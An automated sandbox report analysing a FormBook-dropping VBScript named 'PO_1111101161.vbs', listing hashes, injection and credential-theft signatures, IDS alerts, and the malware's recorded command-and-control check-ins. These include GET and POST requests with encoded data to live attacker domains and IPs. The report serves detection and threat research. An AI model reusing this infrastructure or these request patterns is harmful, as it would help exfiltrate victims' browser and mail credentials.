

Windows Analysis Report
PO_1111101161.vbs

Overview

General Information

Sample name: PO_1111101161.vbs
Analysis ID: 1566711
MD5: 9311a38007910531ee085752d8f4bb94
SHA1: cd22e03275c2688f1600be4c520caaf87d76a4ec
SHA256: d4601158ebeec0fe8fd9799a60742222dc74d3eda2b7203f705d8195596bb12b
Tags: Formbook, vbs, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential malicious VBS script found (has network functionality)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 7424 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • p_Cm7afCdw.exe (PID: 7632 cmdline: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" MD5: 5E4094C909CCCBA80D844F553391F9F2)
      • RegAsm.exe (PID: 7780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • IGcdoWhymz.exe (PID: 5336 cmdline: "C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • SearchProtocolHost.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
            • IGcdoWhymz.exe (PID: 5312 cmdline: "C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 8052 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", ProcessId: 7424, ProcessName: wscript.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7424, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" , ProcessId: 7632, ProcessName: p_Cm7afCdw.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", ProcessId: 7424, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T15:54:15.558508+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | TCP
2024-12-02T15:54:40.854477+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49883 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:56.495424+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49922 | 47.254.140.255 | 80 | TCP
2024-12-02T15:55:12.428428+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49957 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:27.961594+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49989 | 104.21.24.198 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T15:54:15.558508+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49825 | 156.251.17.224 | 80 | TCP
2024-12-02T15:54:40.854477+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49883 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:56.495424+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49922 | 47.254.140.255 | 80 | TCP
2024-12-02T15:55:12.428428+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49957 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:27.961594+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 104.21.24.198 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-02T15:54:32.780909+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49862 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:35.448250+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49868 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:38.104466+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49875 | 129.226.153.85 | 80 | TCP
2024-12-02T15:54:48.458834+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49901 | 47.254.140.255 | 80 | TCP
2024-12-02T15:54:51.148441+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49907 | 47.254.140.255 | 80 | TCP
2024-12-02T15:54:53.921492+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49914 | 47.254.140.255 | 80 | TCP
2024-12-02T15:55:03.753321+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49937 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:06.426773+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49945 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:09.123055+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49951 | 208.91.197.27 | 80 | TCP
2024-12-02T15:55:19.954873+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49977 | 104.21.24.198 | 80 | TCP
2024-12-02T15:55:22.669325+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 104.21.24.198 | 80 | TCP
2024-12-02T15:55:25.315029+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 104.21.24.198 | 80 | TCP


AV Detection

Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: PO_1111101161.vbs, ReversingLabs: Detection: 18%
Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Joe Sandbox ML: detected
Source: Binary string: wntdll.pdb, source: RegAsm.exe, SearchProtocolHost.exe
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 6_2_02C1CB30 FindFirstFileW,FindNextFileW,FindClose, 6_2_02C1CB30

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 4x nop then xor eax, eax, 6_2_02C09EC0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: 4x nop then mov ebx, 00000004h, 6_2_032304CE
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then mov ebx, 00000004h, 11_2_0000021FB4D6A4CE

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49825 -> 156.251.17.224:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49825 -> 156.251.17.224:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 129.226.153.85:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49862 -> 129.226.153.85:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49875 -> 129.226.153.85:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49883 -> 129.226.153.85:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49883 -> 129.226.153.85:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49901 -> 47.254.140.255:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49907 -> 47.254.140.255:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49914 -> 47.254.140.255:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49922 -> 47.254.140.255:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49922 -> 47.254.140.255:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49937 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49945 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49951 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49957 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49957 -> 208.91.197.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 104.21.24.198:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 104.21.24.198:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 104.21.24.198:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49989 -> 104.21.24.198:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 104.21.24.198:80
                Source: DNS query: www.duwixushx.xyz
                Source: Initial file: stream.SaveToFile filePath, 2
Source: Joe Sandbox View, IP Address: 208.91.197.27
Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View, ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View, ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: global traffic, HTTP traffic detected: GET /bmve/?l0W=Yh8P&cNeT5P=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdX9QsE8jTEAf7iu+rTrEYDmOQoqL5x871qcXt+MmivaGg02pJqeyLSBOj HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.duwixushx.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /od8t/?cNeT5P=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuAseiIzOw6dSVdaELJzAoH4UPHDMi9vPJYMLHkfbSf8iDlLYPpS7IMNNH&l0W=Yh8P HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.1qcczjvh2.autos | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /i7qk/?cNeT5P=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImU0UbKzMKFpXAJ3iP9s5hV6VkbgV3kS/JEHHqfdUXmoMZ21WIq3bcKVXK&l0W=Yh8P HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.yvcp3.info | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8P HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.guacamask.online | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8P HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.supernutra01.online | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.duwixushx.xyz
Source: global traffic, DNS traffic detected: DNS query: www.1qcczjvh2.autos
Source: global traffic, DNS traffic detected: DNS query: www.yvcp3.info
Source: global traffic, DNS traffic detected: DNS query: www.guacamask.online
Source: global traffic, DNS traffic detected: DNS query: www.supernutra01.online
Source: unknown, HTTP traffic detected: POST /od8t/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.1qcczjvh2.autos | Connection: close | Content-Length: 219 | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Origin: http://www.1qcczjvh2.autos | Referer: http://www.1qcczjvh2.autos/od8t/ | User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36 | Data Ascii: cNeT5P=eU4BQVoGQCnLMqk0zIR0hi/MobP8Df6qG8zvMyHf7HphEcAdt4c4AZqumtmGVD4u1A0/sjq7HvIKdPkcOed9c+C1SlDC7teTdrczCAMkL5wiFWAW+Mz8MOnsq9fIZ+iP1YJ02gWhBOMdFufVgs6sRgZFx1bMZoyx1/rYrwNSFNYeSU2BOwgt+keflbVQ85P94YP123W9rlavclJu+A==
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 02 Dec 2024 14:54:15 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 02 Dec 2024 14:54:32 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 58288 | Connection: close | Vary: Accept-Encoding | ETag: "67344967-e3b0"
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 02 Dec 2024 14:54:35 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 58288 | Connection: close | Vary: Accept-Encoding | ETag: "67344967-e3b0"
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 02 Dec 2024 14:54:40 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 58288 | Connection: close | Vary: Accept-Encoding | ETag: "67344967-e3b0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BA2307CB09D5BCE513E9A111C4B077560E011CF4AD77CC8419F4FE01100Set-Cookie: _csrf=3b4b0fde9b3dc4f4857cb02cd320607166595c4e6a98603cc9bf48ea1c75a3b6a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22usZSH9FSJfKQaAh0Zx-NRxrxSR5gpuhH%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 4f 67 57 4e 4c 63 77 74 45 50 58 63 4c 4a 51 56 4a 42 49 30 33 71 30 61 71 59 49 65 4f 63 32 55 42 77 51 32 65 61 6d 34 67 35 5a 6d 30 78 6e 5f 77 6e 79 45 4a 30 57 2d 51 45 31 30 53 44 6a 49 4d 78 48 36 46 6f 41 6c 55 34 44 54 69 57 2d 6c 74 4f 4b 52 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 
68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B530CFD9BB47414204151692DDDCA75D165461BC9FB428C36B5F892C100Set-Cookie: _csrf=7f736ae0f0bba6261ca88e0fc347fe4a5174a935a4ba041b4002b99a58c34582a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22r2jNNJVMFYV4GWv34yKFNMTVnwFsBemT%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 4d 50 39 4e 71 7a 6e 74 66 55 31 39 6c 69 79 75 42 53 4e 77 39 46 43 6f 70 63 30 36 74 64 5a 6c 35 4f 32 2d 59 38 37 